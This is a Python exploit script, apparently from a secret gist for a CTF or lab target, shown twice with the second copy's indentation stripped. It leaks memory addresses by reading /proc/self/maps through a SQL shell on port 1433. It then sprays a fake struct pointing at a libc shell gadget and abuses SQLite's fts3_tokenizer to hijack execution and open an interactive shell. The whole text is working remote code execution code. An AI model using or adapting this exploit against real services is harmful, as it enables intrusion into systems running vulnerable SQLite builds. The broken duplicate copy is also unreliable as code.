bongtrop/spl_sql_demo_test.py Secret

## spl_sql_demo_test.py
#!/usr/bin/env python3

import sys
# https://github.com/hellman/sock
from sock import Sock
import os
import sys
import struct

# In Apple M1, it is very hard to install pwntools, so just don't use it
# from pwn import *

print("Start Exploit !")
if len(sys.argv) == 2:
    host = sys.argv[1]
else:
    print("Local Test")
    host = os.getenv('MY_IP') or '10.60.3.3'
print("Target: {}".format(host))

def execute(sql, last=False):
    global s
    s.sendline(sql)
    return s.readuntil("> ")[:-2]


s = Sock(host, 1433)
s.readuntil(">")

map_raw = execute(".read /proc/self/maps")
maps = map_raw.splitlines()
libc_addr = int(maps[23][:12], 16)
heap_addr = int(maps[6][:12], 16)

spawn_shell_addr = libc_addr + 0xc96da
# spawn_shell_addr = 0xdeadbeef

shell_struct =  struct.pack("<Q", 0)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)

execute(f"select replace(hex(zeroblob(31337)), '00', x'414E5941414E5941{shell_struct.hex()}414E5941414E5941');")

# Calc from GDB
heap_offset = 0x1221b0
shell_struct_addr = heap_addr + heap_offset
print("Struct Addr:", hex(shell_struct_addr))
shell_struct_addr_hex = struct.pack("<Q", shell_struct_addr).hex()

execute(f"select hex(fts3_tokenizer('shell', x'{shell_struct_addr_hex}'));")

# s.interactive()
s.sendline('create virtual table shell using fts3(tokenize=shell);')
s.interactive()
	#!/usr/bin/env python3

	import sys
	# https://github.com/hellman/sock
	from sock import Sock
	import os
	import sys
	import struct

	# In Apple M1, it is very hard to install pwntools, so just don't use it
	# from pwn import *

	print("Start Exploit !")
	if len(sys.argv) == 2:
	host = sys.argv[1]
	else:
	print("Local Test")
	host = os.getenv('MY_IP') or '10.60.3.3'
	print("Target: {}".format(host))

	def execute(sql, last=False):
	global s
	s.sendline(sql)
	return s.readuntil("> ")[:-2]


	s = Sock(host, 1433)
	s.readuntil(">")

	map_raw = execute(".read /proc/self/maps")
	maps = map_raw.splitlines()
	libc_addr = int(maps[23][:12], 16)
	heap_addr = int(maps[6][:12], 16)

	spawn_shell_addr = libc_addr + 0xc96da
	# spawn_shell_addr = 0xdeadbeef

	shell_struct = struct.pack("<Q", 0)
	shell_struct += struct.pack("<Q", spawn_shell_addr)
	shell_struct += struct.pack("<Q", spawn_shell_addr)
	shell_struct += struct.pack("<Q", spawn_shell_addr)
	shell_struct += struct.pack("<Q", spawn_shell_addr)
	shell_struct += struct.pack("<Q", spawn_shell_addr)

	execute(f"select replace(hex(zeroblob(31337)), '00', x'414E5941414E5941{shell_struct.hex()}414E5941414E5941');")

	# Calc from GDB
	heap_offset = 0x1221b0
	shell_struct_addr = heap_addr + heap_offset
	print("Struct Addr:", hex(shell_struct_addr))
	shell_struct_addr_hex = struct.pack("<Q", shell_struct_addr).hex()

	execute(f"select hex(fts3_tokenizer('shell', x'{shell_struct_addr_hex}'));")

	# s.interactive()
	s.sendline('create virtual table shell using fts3(tokenize=shell);')
	s.interactive()